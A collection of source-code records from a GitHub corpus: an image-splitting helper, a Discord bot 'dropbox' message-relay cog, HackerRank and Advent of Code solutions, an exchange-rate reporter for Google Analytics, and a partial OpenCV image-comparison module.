list:\n r\"\"\" Use the simple numpy slicing function.\n\n Args:\n image (cv2.imread): Image format read by opencv.\n row_number (int): Split along the width of the image. (Default: 9).\n col_number (int): Split along the height of the image. (Default: 9).\n\n Shape:\n image: :math:`(N, *)` where :math:`*` means, any number of additional dimensions\n\n Returns:\n Split an array into multiple sub-arrays.\n \"\"\"\n __constant__ = [\"row_number\", \"col_number\"]\n row_number: int\n col_number: int\n\n # Cut picture vertically, get a lot of horizontal strips\n block_row = np.array_split(image, row_number, axis=0)\n image_blocks = []\n for block in block_row:\n # Horizontal direction cutting, get a lot of image blocks\n block_col = np.array_split(block, col_number, axis=1)\n image_blocks += [block_col]\n\n return image_blocks\n\n\ndef save_split_image(img_dir: str, row_number: int = 9, col_number: int = 9, delete: bool = True) -> None:\n r\"\"\" Save the split image.\n\n Args:\n img_dir (str): Original image folder to be processed.\n row_number (int): Split along the width of the image. (Default: 9).\n col_number (int): Split along the height of the image. (Default: 9).\n delete (optional, bool): Do you want to delete the original image after processing. (Default:``True``).\n \"\"\"\n __constant__ = [\"delete\"]\n delete: bool\n\n for filename in glob.glob(f\"{img_dir}/*\"):\n img = cv2.imread(filename)\n image_blocks = split_for_slicling(img, row_number=row_number, col_number=col_number)\n for row in range(row_number):\n for col in range(col_number):\n image_blocks[row][col] = Image.fromarray(cv2.cvtColor(image_blocks[row][col], cv2.COLOR_BGR2RGB))\n image_blocks[row][col].save(f\"{img_dir}/{filename.split('/')[-1].split('.')[0]}_{row}_{col}.bmp\")\n if delete:\n os.remove(filename)\n\n\nif __name__ == \"__main__\":\n save_split_image(\"./4x/train/input\")\n","repo_name":"anneouyang/noisy-superres","sub_path":"ESRGAN-PyTorch/data/split_image.py","file_name":"split_image.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"2851691291","text":"import asyncio\nimport io\nfrom asyncio import CancelledError\n\nimport aiohttp\nimport discord\nimport tortoise.exceptions\nfrom discord import Forbidden, Embed, NotFound, HTTPException\nfrom discord.ext import commands, tasks\nfrom discord.utils import utcnow\nfrom tortoise.exceptions import DoesNotExist\n\nimport utils.Logging\nfrom utils.Logging import TCol\nfrom cogs.BaseCog import BaseCog\nfrom utils import Lang, Questions, Utils, Logging\nfrom utils.Database import DropboxChannel\n\n\nclass DropBox(BaseCog):\n\n def __init__(self, bot):\n super().__init__(bot)\n self.dropboxes = dict()\n self.responses = dict()\n self.drop_messages = dict()\n self.delivery_in_progress = dict()\n self.delete_in_progress = dict()\n self.clean_in_progress = False\n\n async def on_ready(self):\n await self.bot.wait_until_ready()\n Logging.info(f\"\\t{TCol.cOkBlue}starting DropBox{TCol.cEnd}\")\n\n for guild in self.bot.guilds:\n # fetch dropbox channels per server\n await self.init_guild(guild.id)\n for row in await DropboxChannel.filter(serverid=guild.id):\n self.dropboxes[guild.id][row.sourcechannelid] = row\n\n # TODO: replace with asyncio queue?\n if not self.deliver_to_channel.is_running():\n self.deliver_to_channel.start()\n if not self.clean_channels.is_running():\n self.clean_channels.start()\n\n async def init_guild(self, guild_id):\n self.dropboxes[guild_id] = dict()\n self.drop_messages[guild_id] = dict()\n self.delivery_in_progress[guild_id] = dict()\n self.delete_in_progress[guild_id] = dict()\n\n def cog_unload(self):\n self.deliver_to_channel.cancel()\n self.clean_channels.cancel()\n\n async def cog_check(self, ctx):\n return ctx.guild is not None \\\n and (ctx.author.guild_permissions.ban_members or await self.bot.permission_manage_bot(ctx))\n\n @commands.Cog.listener()\n async def on_guild_join(self, guild):\n await self.init_guild(guild.id)\n\n @commands.Cog.listener()\n async def on_guild_remove(self, guild):\n del self.dropboxes[guild.id]\n del self.drop_messages[guild.id]\n del self.delivery_in_progress[guild.id]\n del self.delete_in_progress[guild.id]\n await DropboxChannel.filter(serverid=guild.id).delete()\n\n # TODO: replace with asyncio queue?\n @tasks.loop(seconds=10.0)\n async def deliver_to_channel(self):\n send_tasks = []\n for guild_id, guild_queue in self.drop_messages.items():\n for channel_id, message_queue in guild_queue.items():\n try:\n # get dropbox channel\n drop_channel = self.bot.get_channel(self.dropboxes[guild_id][channel_id].targetchannelid)\n working_queue = dict(message_queue)\n for message_id, message in working_queue.items():\n if channel_id not in self.delivery_in_progress[guild_id]:\n self.delivery_in_progress[guild_id][channel_id] = set()\n if message_id not in self.delivery_in_progress[guild_id][channel_id]:\n self.delivery_in_progress[guild_id][channel_id].add(message_id)\n send_tasks.append(self.bot.loop.create_task(self.drop_message_impl(message, drop_channel)))\n except Exception as e:\n pass\n try:\n if send_tasks:\n await asyncio.gather(*send_tasks)\n except CancelledError as e:\n raise e\n except Exception as e:\n await Utils.handle_exception(\"Dropbox gather send tasks failed\", self.bot, e)\n\n async def drop_message_impl(self, source_message, drop_channel):\n \"\"\"\n handles copying to dropbox, sending confirm message in channel, sending dm receipt, and deleting original\n for each message in any dropbox\n \"\"\"\n guild_id = source_message.channel.guild.id\n source_channel_id = source_message.channel.id\n source_message_id = source_message.id\n\n # get the ORM row for this dropbox.\n drop = None\n if source_channel_id in self.dropboxes[guild_id]:\n drop = self.dropboxes[guild_id][source_channel_id]\n else:\n # should only return one entry because of how rows are added\n drop = await DropboxChannel.filter(serveri=guild_id, sourcechannelid=source_channel_id)\n\n # the embed to display who was the author in dropbox channel\n embed = Embed(\n timestamp=source_message.created_at,\n color=0x663399)\n avatar = source_message.author.avatar.replace(size=32) if source_message.author.avatar else None\n embed.set_author(name=f\"{source_message.author} ({source_message.author.id})\",\n icon_url=avatar)\n embed.add_field(name=\"Author link\", value=source_message.author.mention)\n ctx = await self.bot.get_context(source_message)\n\n pages = Utils.paginate(source_message.content)\n page_count = len(pages)\n\n if source_message.author.dm_channel is None:\n await source_message.author.create_dm()\n dm_channel = source_message.author.dm_channel\n\n attachment_names = []\n delivery_success = None\n last_drop_message = None\n\n try:\n # send embed and message to dropbox channel\n for attachment in source_message.attachments:\n try:\n buffer = io.BytesIO()\n await attachment.save(buffer)\n await drop_channel.send(file=discord.File(buffer, attachment.filename))\n attachment_names.append(attachment.filename)\n except Exception as attach_e:\n await drop_channel.send(\n Lang.get_locale_string('dropbox/attachment_fail', ctx, author=source_message.author.mention))\n \n if len(pages) == 0:\n # means no text content included\n if len(attachment_names) < 1:\n # if there aren't any attachments, include a message indicating that\n last_drop_message = await drop_channel.send(\n embed=embed, content=Lang.get_locale_string('dropbox/msg_blank', ctx))\n else:\n last_drop_message = await drop_channel.send(embed=embed)\n else:\n # deliver all the pages of text content\n for i, page in enumerate(pages[:-1]):\n if len(pages) > 1:\n page = f\"**{i+1} of {page_count}**\\n{page}\"\n await drop_channel.send(page)\n last_page = pages[-1] if page_count == 1 else f\"**{page_count} of {page_count}**\\n{pages[-1]}\"\n last_drop_message = await drop_channel.send(embed=embed, content=last_page)\n \n # TODO: try/ignore: add reaction for \"claim\" \"flag\" \"followup\" \"delete\"\n msg = Lang.get_locale_string('dropbox/msg_delivered', ctx, author=source_message.author.mention)\n await ctx.send(msg)\n delivery_success = True\n except Exception as e:\n delivery_success = False\n msg = Lang.get_locale_string('dropbox/msg_not_delivered', ctx, author=source_message.author.mention)\n await ctx.send(msg)\n await self.bot.guild_log(guild_id, \"broken dropbox...? Call alex, I guess\")\n await Utils.handle_exception(\"dropbox delivery failure\", self.bot, e)\n\n try:\n # delete original message, the confirmation of sending is deleted in clean_channels loop\n await source_message.delete()\n del self.drop_messages[guild_id][source_channel_id][source_message_id]\n set(self.delivery_in_progress[guild_id][source_channel_id]).remove(source_message_id)\n except discord.errors.NotFound as e:\n # ignore missing message\n pass\n\n # give senders a moment before spam pinging them the copy\n await asyncio.sleep(1)\n\n try:\n # try sending dm receipts and report in dropbox channel if it was sent or not\n if drop and drop.sendreceipt:\n # get the locale versions of the messages for status, receipt header, and attachments ready to be sent\n status_msg = Lang.get_locale_string(\n 'dropbox/msg_delivered' if delivery_success else 'dropbox/msg_not_delivered', ctx, author=\"\")\n receipt_msg_header = Lang.get_locale_string('dropbox/msg_receipt', ctx, channel=ctx.channel.mention)\n if len(attachment_names) == 0:\n attachment_msg = \"\"\n else:\n attachment_msg_key = 'dropbox/receipt_attachment_plural' if len(attachment_names) > 1 else 'dropbox/receipt_attachment_singular'\n attachment_msg = Lang.get_locale_string(\n attachment_msg_key, \n ctx, \n number=len(attachment_names), \n attachments=\", \".join(attachment_names)\n )\n # might as well try to stuff in as few pages as possible\n dm_header_pages = Utils.paginate(f\"{status_msg}\\n{receipt_msg_header}\\n{attachment_msg}\")\n\n for page in dm_header_pages:\n await dm_channel.send(page)\n\n if len(pages) == 0:\n # no text content\n if len(attachment_names) < 1:\n # if no text and no attachments, then send a response that there wasn't any text content\n await dm_channel.send(content=Lang.get_locale_string('dropbox/msg_blank', ctx))\n else:\n # send the page(s) in code blocks to dm.\n for i, page in enumerate(pages[:-1]):\n if len(pages) > 1:\n page = f\"**{i+1} of {page_count}**\\n```{page}```\"\n await dm_channel.send(page)\n \n last_page = f'```{pages[-1]}```' if page_count == 1 else f\"**{page_count} of {page_count}**\\n```{pages[-1]}```\"\n await dm_channel.send(last_page)\n if delivery_success and last_drop_message is not None:\n embed.add_field(name=\"receipt status\", value=\"sent\")\n # this is used if drop first before dms to add status to embed\n edited_message = await last_drop_message.edit(embed=embed)\n except Exception as e:\n Logging.info(\"Dropbox DM receipt failed, not an issue so ignoring exception and giving up\")\n if drop.sendreceipt and delivery_success:\n embed.add_field(name=\"receipt status\", value=\"failed\")\n # this is used if drop first before dms to add status to embed\n if last_drop_message is not None:\n edited_message = await last_drop_message.edit(embed=embed)\n\n @tasks.loop(seconds=3.0)\n async def clean_channels(self):\n if self.clean_in_progress:\n return\n\n self.clean_in_progress = True\n\n for guild in self.bot.guilds:\n for channel_id, drop in dict(self.dropboxes[guild.id]).items():\n if drop.deletedelayms == 0:\n # do not clear from dropbox channels with no delay set.\n continue\n\n channel = None\n # Look for channel history. Try 10 times to fetch channel history\n # this API call fails on startup because connection is not made yet.\n now = utcnow()\n channel = self.bot.get_channel(channel_id)\n if channel_id not in self.delete_in_progress[guild.id]:\n self.delete_in_progress[guild.id][channel_id] = set()\n\n try:\n clean_tasks = []\n async for message in channel.history(limit=20):\n # check if message is queued for delivery\n if (channel_id in self.drop_messages[guild.id]) and\\\n (message.id in self.drop_messages[guild.id][channel_id]):\n # don't delete messages that are queued\n continue\n my_member = guild.get_member(message.author.id)\n if my_member is None:\n continue\n is_mod = my_member.guild_permissions.ban_members or await self.bot.member_is_admin(my_member.id)\n age = (now-message.created_at).seconds\n expired = age > drop.deletedelayms / 1000\n\n try:\n queued_for_delete = message.id in self.delete_in_progress[guild.id][channel_id]\n except KeyError:\n # bot is restarting - stop processing and pick this up next time\n break\n\n # periodically clear out expired messages sent by bot and non-mod\n if expired and not queued_for_delete and (message.author.bot or not is_mod):\n self.delete_in_progress[guild.id][channel_id].add(message.id)\n self.bot.loop.create_task(self.clean_message(message))\n else:\n pass\n if clean_tasks:\n await asyncio.gather(*clean_tasks)\n except (CancelledError, asyncio.TimeoutError, discord.DiscordServerError, NotFound, RuntimeError) as e:\n # I think these are safe to ignore...\n pass\n except aiohttp.ClientOSError:\n await self.bot.guild_log(guild.id, f\"Dropbox client error. Probably safe to ignore, but check \"\n f\"your dropbox channels to make sure they are clean.\")\n continue\n except RuntimeError as e:\n await self.bot.guild_log(guild.id, f\"Dropbox error for guild `{guild.name}`. What's broken?\")\n # fall through and report\n except Exception as e:\n # ignore but log\n await Utils.handle_exception('dropbox clean failure', self.bot, e)\n continue\n self.clean_in_progress = False\n\n async def clean_message(self, message):\n try:\n await message.delete()\n self.delete_in_progress[message.channel.guild.id][message.channel.id].remove(message.id)\n except (NotFound, HTTPException, Forbidden) as e:\n # ignore delete failure. we'll try again next time\n await Utils.handle_exception('dropbox clean_message failure', self.bot, e)\n\n @commands.group(name=\"dropbox\", invoke_without_command=True)\n @commands.guild_only()\n async def dropbox(self, ctx):\n \"\"\"List the dropbox settings. Use sub-commands to configure dropboxes\n\n Parameters\n ----------\n ctx\n \"\"\"\n # list dropbox channels\n embed = Embed(\n timestamp=ctx.message.created_at,\n color=0x663399,\n title=Lang.get_locale_string(\"dropbox/list\", ctx, server_name=ctx.guild.name))\n for source, dropbox in self.dropboxes[ctx.guild.id].items():\n source_channel = self.bot.get_channel(source)\n target_channel = self.bot.get_channel(dropbox.targetchannelid)\n embed.add_field(name=f\"From\",\n value=Utils.get_channel_description(self.bot, source_channel.id),\n inline=True)\n embed.add_field(name=f\"To\",\n value=Utils.get_channel_description(self.bot, target_channel.id),\n inline=True)\n embed.add_field(name=f\"Delete After\",\n value=Utils.to_pretty_time(dropbox.deletedelayms/1000) or \"off\",\n inline=True)\n embed.add_field(name=f\"send receipt\",\n value=dropbox.sendreceipt,\n inline=True)\n embed.add_field(name=\"__ __\",\n value=\"__ __\",\n inline=False)\n if len(self.dropboxes[ctx.guild.id]) == 0:\n embed.add_field(name=\"Not Set\", value=\"Add dropboxes using `dropbox add` command\")\n await ctx.send(embed=embed)\n\n @dropbox.command()\n @commands.guild_only()\n async def add(self, ctx, source_channel: discord.TextChannel, target_channel: discord.TextChannel):\n \"\"\"Add a dropbox channel. Messages sent by non-moderator members will be delivered from the source channel to a\n destination channel. Destination can be public or private, as long as the bot has access.\n\n Parameters\n ----------\n ctx\n sourceid\n ID of the source channel\n targetid\n ID of the destination channel\n\n Returns\n -------\n\n \"\"\"\n sourceid = source_channel.id\n targetid = target_channel.id\n\n # validate channel ids\n source_channel = self.bot.get_channel(sourceid)\n target_channel = self.bot.get_channel(targetid)\n if not source_channel:\n await ctx.send(Lang.get_locale_string('dropbox/channel_not_found', ctx, channel_id=sourceid))\n if not target_channel:\n await ctx.send(Lang.get_locale_string('dropbox/channel_not_found', ctx, channel_id=targetid))\n if not source_channel or not target_channel:\n # valid source and target channels are required\n return\n\n # initialize to None for the case of adding a new entry\n update_entry = None\n\n # channel descriptions\n source_description = Utils.get_channel_description(self.bot, sourceid)\n new_target_description = Utils.get_channel_description(self.bot, targetid)\n old_target_description = \"\"\n\n def update(choice):\n nonlocal update_entry\n update_entry = choice\n\n if sourceid in self.dropboxes[ctx.guild.id]:\n # existing source channel. ask user to confirm\n old_target_description = Utils.get_channel_description(\n self.bot,\n self.dropboxes[ctx.guild.id][sourceid].targetchannelid)\n try:\n await Questions.ask(\n self.bot,\n ctx.channel,\n ctx.author,\n Lang.get_locale_string('dropbox/override_confirmation',\n ctx,\n source=source_description,\n old_target=old_target_description,\n new_target=new_target_description),\n [\n Questions.Option('YES', handler=lambda: update(True)),\n Questions.Option('NO', handler=lambda: update(False))\n ], delete_after=True, locale=ctx)\n except asyncio.TimeoutError as e:\n update(False)\n\n if update_entry is False:\n # user chose not to update\n await ctx.send(Lang.get_locale_string('dropbox/not_updating', ctx))\n return\n\n if update_entry:\n # user chose to update\n msg = Lang.get_locale_string('dropbox/updated',\n ctx,\n source=source_description,\n old_target=old_target_description,\n new_target=new_target_description)\n else:\n # no existing source. adding a new dropbox\n msg = Lang.get_locale_string('dropbox/added',\n ctx,\n source=source_description,\n target=new_target_description)\n\n try:\n # update local mapping and save to db\n db_row, created = await DropboxChannel.get_or_create(serverid=ctx.guild.id, sourcechannelid=sourceid)\n db_row.targetchannelid = targetid\n await db_row.save()\n self.dropboxes[ctx.guild.id][sourceid] = db_row\n except Exception as e:\n await Utils.handle_exception(\"Failed to update dropbox channel\", self.bot, e)\n await ctx.send(\"Can't save dropox channel.\")\n return\n\n # message success to user\n await ctx.send(msg)\n\n @dropbox.command()\n @commands.guild_only()\n async def remove(self, ctx, source_channel: discord.TextChannel):\n \"\"\"Remove a dropbox channel. Stop delivering messages from the given channel.\n\n Parameters\n ----------\n ctx\n source_channel: discord.TextChannel\n ID of the source channel.\n\n Returns\n -------\n\n \"\"\"\n sourceid = source_channel.id\n source_description = Utils.get_channel_description(self.bot, sourceid)\n if sourceid not in self.dropboxes[ctx.guild.id]:\n await ctx.send(Lang.get_locale_string('dropbox/not_removed', ctx, source=source_description))\n return\n\n try:\n drop_row = await DropboxChannel.get(serverid=ctx.guild.id,\n sourcechannelid=sourceid)\n await drop_row.delete()\n del self.dropboxes[ctx.guild.id][sourceid]\n except DoesNotExist:\n await ctx.send(\"no such channel to remove from dropboxes\")\n except tortoise.exceptions.MultipleObjectsReturned:\n await ctx.send(\"too many dropbox channels match that id???\")\n except Exception as e:\n await Utils.handle_exception('dropbox delete failure', self.bot, e)\n raise e\n await ctx.send(Lang.get_locale_string('dropbox/removed', ctx, source=source_description))\n\n @dropbox.command(aliases=['delay', 'delete_delay'])\n @commands.guild_only()\n async def set_delay(self, ctx, channel: discord.TextChannel, delay: float):\n \"\"\"Set the lifespan for response messages in the channel\n\n Also applies to any non-mod messages, so the delay time must be greater than the initial wait for message drops.\n\n Parameters\n ----------\n ctx\n channel: discord.TextChannel\n Channel mention or ID\n delay: int\n Time until responses expire (seconds)\n \"\"\"\n if channel.id in self.dropboxes[ctx.guild.id]:\n drop_row = self.dropboxes[ctx.guild.id][channel.id]\n drop_row.deletedelayms = int(delay * 1000)\n await drop_row.save()\n t = Utils.to_pretty_time(delay)\n await ctx.send(Lang.get_locale_string('dropbox/set_delay_success', ctx, channel=channel.mention, time=t))\n else:\n await ctx.send(Lang.get_locale_string('dropbox/set_delay_fail', ctx, channel=channel.mention))\n\n @dropbox.command()\n @commands.guild_only()\n async def set_receipt(self, ctx, source_channel: discord.TextChannel, receipt_setting: bool):\n \"\"\"Enable/disable DM receipts. When set, a copy of each dropbox message is sent by DM to the author.\n\n Parameters\n ----------\n ctx\n source_channel: discord.TextChannel\n Channel mention or ID\n receipt_setting: bool\n Boolean (on or off, 0 or 1, yes or no)\n \"\"\"\n if source_channel.id in self.dropboxes[ctx.guild.id]:\n drop_row = self.dropboxes[ctx.guild.id][source_channel.id]\n drop_row.sendreceipt = receipt_setting\n await drop_row.save()\n msg = Lang.get_locale_string('dropbox/receipt_set_false', ctx, channel=source_channel.mention)\n if receipt_setting:\n msg = Lang.get_locale_string('dropbox/receipt_set_true', ctx, channel=source_channel.mention)\n await ctx.send(msg)\n\n @commands.Cog.listener()\n async def on_message(self, message: discord.message):\n try:\n guild_id = message.channel.guild.id\n message_not_in_guild = not hasattr(message.channel, \"guild\") or message.channel.guild is None\n author_not_in_guild = not hasattr(message.author, \"guild\")\n channel_not_in_dropboxes = message.channel.id not in self.dropboxes[guild_id]\n is_mod = message.author.guild_permissions.ban_members or await self.bot.member_is_admin(message.author.id)\n except Exception as e:\n return\n\n if message.author.bot or message_not_in_guild or author_not_in_guild or \\\n channel_not_in_dropboxes or is_mod:\n # check for dropbox matching channel id\n # ignore bots and mods/admins\n return\n\n # queue this message id for delivery/deletion\n if message.channel.id not in self.drop_messages[guild_id]:\n self.drop_messages[guild_id][message.channel.id] = dict()\n self.drop_messages[guild_id][message.channel.id][message.id] = message\n\n\nasync def setup(bot):\n await bot.add_cog(DropBox(bot))\n","repo_name":"e-a-h/That-Sky-Bot","sub_path":"cogs/DropBox.py","file_name":"DropBox.py","file_ext":"py","file_size_in_byte":25585,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"35"} +{"seq_id":"27344846066","text":"# HACKERRANK\n# https://www.hackerrank.com/challenges/largest-permutation/problem\n\n# Credits to https://www.hackerrank.com/rednithin\n\nimport sys\n\ndef largestPermutation(k, arr):\n d = {}\n for i, num in enumerate(arr):\n d[num] = i\n for i, num in enumerate(arr):\n if k == 0:\n break\n if num == len(arr) - i:\n continue\n i1 = d[num]\n i2 = d[len(arr)-i]\n\n arr[i], arr[d[len(arr)-i]] = arr[d[len(arr)-i]], arr[i]\n d[num] = i2\n d[len(arr)-i] = i1\n k -= 1\n return arr\n\nif __name__ == \"__main__\":\n n, k = input().strip().split(' ')\n n, k = [int(n), int(k)]\n arr = list(map(int, input().strip().split(' ')))\n result = largestPermutation(k, arr)\n print (\" \".join(map(str, result)))\n","repo_name":"sharadbhat/Competitive-Coding","sub_path":"HackerRank/Algorithms/Largest_Permutation.py","file_name":"Largest_Permutation.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5661794326","text":"import re\nfrom math import floor\nimport copy\n\ndef monkeyOperation(item, instructions):\n operand = instructions[1]\n if operand == 'old':\n return item * item\n else:\n instr = str(instructions[0] + instructions[1])\n return eval(str(item) + instr)\n\n\ndef monkeyTest(worryLevel, divisor):\n if not (worryLevel % divisor):\n return 't'\n else:\n return 'f'\n\n\ndef stuffSlinging(monkeys, lcm):\n for i in range(10000):\n for monkey in monkeys.values():\n currentItems = copy.copy(monkey['items'])\n for item in currentItems:\n monkey['items'].pop(0)\n newWorry = monkeyOperation(item, monkey['oper'])\n newWorry = newWorry % lcm # the result of the modulus is \n monkey['inspections'] += 1 # equal in mod sense to newWorry\n divisorTest = monkeyTest(newWorry, monkey['test'])\n nextMonkey = str(monkey[divisorTest])\n monkeys[nextMonkey]['items'].append(newWorry) \n inspections = [i['inspections'] for i in monkeys.values()]\n itms = [i['items'] for i in monkeys.values()]\n return inspections, itms\n\n\ndef main():\n monkeys = {}\n currentMonkey = 0\n lcm = 1\n with open('input202211.txt') as file:\n for line in file.readlines():\n lineList = line.split()\n nums = re.findall(r'\\d+', line)\n if not lineList:\n continue\n if lineList[0] == 'Monkey':\n currentMonkey = nums[0]\n monkeys[currentMonkey] = {'inspections':0}\n elif lineList[0] == 'Starting':\n items = [int(i) for i in nums]\n monkeys[currentMonkey]['items'] = items\n elif lineList[0] == 'Operation:':\n monkeys[currentMonkey]['oper'] = lineList[-2:]\n elif lineList[0] == 'Test:':\n monkeys[currentMonkey]['test'] = int(nums[0])\n lcm *= int(nums[0])\n elif lineList[1] == 'true:':\n monkeys[currentMonkey]['t'] = int(nums[0])\n elif lineList[1] == 'false:':\n monkeys[currentMonkey]['f'] = int(nums[0])\n insps, items = stuffSlinging(monkeys, lcm)\n insps.sort()\n monkeyBusiness = insps[-1] * insps[-2]\n print(monkeyBusiness)\n\n\nmain()","repo_name":"JonasAsker/Advent-of-code-2022","sub_path":"day11/solution11.py","file_name":"solution11.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72583130020","text":"import pygamp as pg\nimport uuid\nimport requests\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\nsend_usd_rate = BlockingScheduler()\n\n\nCLIENT_ID = str(uuid.uuid4())\nPROPERTY_ID = 'UA-212228455-1'\nNBU_API_URL = 'https://bank.gov.ua/NBUStatService/v1/statdirectory/exchange?json'\n\n\ndef get_current_currency(currency):\n response = requests.get(url=NBU_API_URL)\n if response.status_code == 200:\n json_data = response.json()\n for currency_data in json_data:\n if currency_data['cc'] == currency:\n return int(currency_data['rate'] * 10000)\n else:\n return None\n\n\ndef send_currency_rate_event(currency):\n current_usd = get_current_currency(currency)\n\n if isinstance(current_usd, int):\n pg.event(\n cid=CLIENT_ID,\n property_id=PROPERTY_ID,\n category='Currency',\n action='Check currency ratio',\n label='USD',\n value=current_usd,\n non_interactive=1\n )\n else:\n print('Unable to get current currency ratio')\n\n\n@send_usd_rate.scheduled_job('interval', minutes=1)\ndef send_usd_rate_func():\n send_currency_rate_event(currency='USD')\n\n\nif __name__ == \"__main__\":\n send_usd_rate.start()\n","repo_name":"ivanovds/prjctr_highload","sub_path":"03_ga/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"69978302500","text":"# ---------- imports ---------- #\nimport numpy as np\nfrom numpy import linalg as LA\nfrom matplotlib import pyplot as plt\nfrom imageio import imread, imwrite\nfrom skimage.metrics import structural_similarity as ssim\nfrom skimage.color import rgb2gray\nimport cv2\n\n\n# ---------- macros ---------- #\nTWO_DIM = 2\nTHREE_DIM = 3\nMAX_GRAY_SCALE = 255\nGRAY_SCALE = 1\nTHRESHOLD = 210\nNO_PARENT = -1\nMIN_IMG_SIZE = 15 * 15\nHORIZONTAL = 1\nVERTICAL = 2\n\n\n# ---------- code ---------- #\n\ndef read_image(file_name, representation=GRAY_SCALE):\n \"\"\"\n reads an image file and converts it into given representation.\n :param file_name: the filename of an image on disk.\n :param representation: representation code, either 1 or 2 defining whether\n should be a grayscale image (1) or an RGB image (2).\n :return: an image with intensities normalized to the range [0,1]\n \"\"\"\n im = np.array(imread(file_name))\n img_float = im.astype(np.float32)\n if representation == 1: # return grayscale image\n if len(im.shape) == TWO_DIM: # image was given in grayscale\n return img_float\n elif len(im.shape) == THREE_DIM: # image is rgb, convert to grayscale\n return rgb2gray(img_float)\n elif representation == 2: # return rgb\n return img_float\n\n\ndef filter_image(img):\n \"\"\"\n clears noise from given image using bilateral Filter.\n :param img: image to filter, assumes its of type 32f\n :return: the filtered image\n \"\"\"\n return cv2.bilateralFilter(img, 9, 50, 50)\n\n\ndef threshold_image(img, threshold=THRESHOLD):\n \"\"\"\n thresholds a grayscale image to a binary image.\n :param threshold: default is 210 by trial and error.\n assumes image is not compatible with otsu's binarization.\n :param img: 2D numpy array of type np.float32\n :return: a tuple (threshold, binary image)\n \"\"\"\n return cv2.threshold(img, threshold, MAX_GRAY_SCALE, cv2.THRESH_BINARY)\n\n\ndef find_contours(thresh):\n \"\"\"\n find contours in image, filters external (not 100%!!)\n :param thresh: binary image as np.array of type np.float32\n :return: returns a list of contours, each\n \"\"\"\n thresh = thresh.astype(np.uint8)\n contours, hierarchy = cv2.findContours(thresh, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_NONE)\n\n # filter outer contours\n filtered_cont = []\n for i in range(len(contours)):\n if hierarchy[0, i, 3] == NO_PARENT:\n filtered_cont.append(contours[i])\n\n return filtered_cont\n\n\ndef mark_contours(contour_arr, img, symmetry, _plot=False):\n \"\"\"\n marks the contours on the image and crops them.\n :return: python list containing tuples of cropped image and its contour.\n \"\"\"\n marg, flag = 7, 0\n # fig, ax = plt.subplots()\n # ax.imshow(img, cmap=\"gray\")\n sub_images = [] # init array for pictures\n for contour in contour_arr:\n\n lower_dim = contour[:, 0]\n x, y = lower_dim[:, 0], lower_dim[:, 1]\n min_x, min_y, max_x, max_y = min(x), min(y), max(x), max(y)\n\n # remove small noise\n if (max_x - min_x) * (max_y - min_y) < MIN_IMG_SIZE:\n continue\n # avoid index error\n if min_x - marg < 0 or min_y - marg < 0 or max_y + marg > img.shape[0] or max_x + marg > img.shape[1]:\n marg = 0\n # crop only half cause image is symmetric:\n # TODO: address different types of symmetry as input from user\n if symmetry == HORIZONTAL:\n if max_x <= img.shape[1] // 2:\n sub_images.append(img[min_y:max_y, min_x:max_x])\n flag = 1\n else: # symmetry is around the X-axis\n if max_y <= img.shape[0] // 2:\n sub_images.append(img[min_y:max_y, min_x:max_x])\n flag = 1\n if _plot and flag:\n ax.plot([min_x - marg, max_x + marg, max_x + marg, min_x - marg, min_x - marg],\n [min_y - marg, min_y - marg, max_y + marg, max_y + marg, min_y - marg], c='r', linewidth=0.4)\n flag = 0\n if _plot:\n plt.savefig(\"found_subshapes2.jpg\")\n # plt.show()\n return sub_images\n\n\ndef rotate_images():\n pass\n\n\ndef resize_image(img, width, height):\n \"\"\"\n resizes the given image to size width X height, doesnt edit the original\n image.\n :param width: integer representing new width\n :param height: integer representing new height\n :param img: np.array represnting the image to resize\n :return: a resized copy of img.\n \"\"\"\n\n return cv2.resize(img, (width, height))\n\n\ndef compare_img(img1, img2, err_function=\"ALL\"):\n \"\"\"\n Receives two images to compare, img1 being the original. and a string indictating\n which error function to use. doesnt assume images are the same size.\n :param err_function: string indicating which comparison func to use, supports:\n (1) \"ALL\" - apply all functions. (2) \"MSE\" - apply MSE err function. (3) \"SSIM\" - apply structural similarity comparison\n :param img1: np.array of type float32.\n :param img2: np.array of type float32.\n :return: np array containing the errors, if \"ALL\" is used then array[0]=MSE and array[1] is SSIM and array[2] is L1\n else its a singleton of chosen function.\n \"\"\"\n\n # make sure images are the same shape #\n height1, width1, height2, width2 = img1.shape[0], img1.shape[1], img2.shape[0], img2.shape[1]\n if img1.shape != img2.shape:\n if width1 * height1 > width2 * height2:\n img1 = resize_image(img1, width2, height2)\n else:\n img2 = resize_image(img2, width1, height1)\n # TODO: create better resize to avoid interpolation when possible\n # compare images#\n func_arr = [mse, ssim, L1_norm]\n err_arr = []\n for func in func_arr:\n if err_function == \"ALL\" or func.__name__.upper() == err_function:\n err_arr.append(func(img1, img2))\n return np.array(err_arr)\n\n\ndef mse(img1, img2):\n \"\"\"\n calculates the mean squared diffrence between two given images. assumes\n the images have the same size image\n :param img1:\n :param img2:\n :return:\n \"\"\"\n err = (np.square(img1 - img2)).mean(axis=None)\n # return the MSE, the lower the error, the more \"similar\"\n # the two images are\n return err\n\n\ndef L1_norm(img1, img2):\n \"\"\"\n\n :param img1:\n :param img2:\n :return:\n \"\"\"\n flattened1 = np.ravel(img1)\n flattened2 = np.ravel(img2)\n return LA.norm((flattened1 - flattened2), ord=1)\n\n\n# def ai_detector(input_img):\n# \"\"\"\n# finding objects in image using resNet - not functional so far!!\n# :param input_img: image to look in.\n# :return:\n# \"\"\"\n# exec_path = os.getcwd()\n#\n# detector = ObjectDetection()\n# detector.setModelTypeAsRetinaNet()\n# detector.setModelPath(os.path.join(exec_path, \"resnet50_coco_best_v2.1.0.h5\"))\n# detector.loadModel()\n#\n# detected = detector.detectObjectsFromImage(input_image=os.path.join(exec_path, input_img),\n# output_image_path=os.path.join(exec_path, \"imagenew.jpg\"))\n# for eachObj in detected:\n# 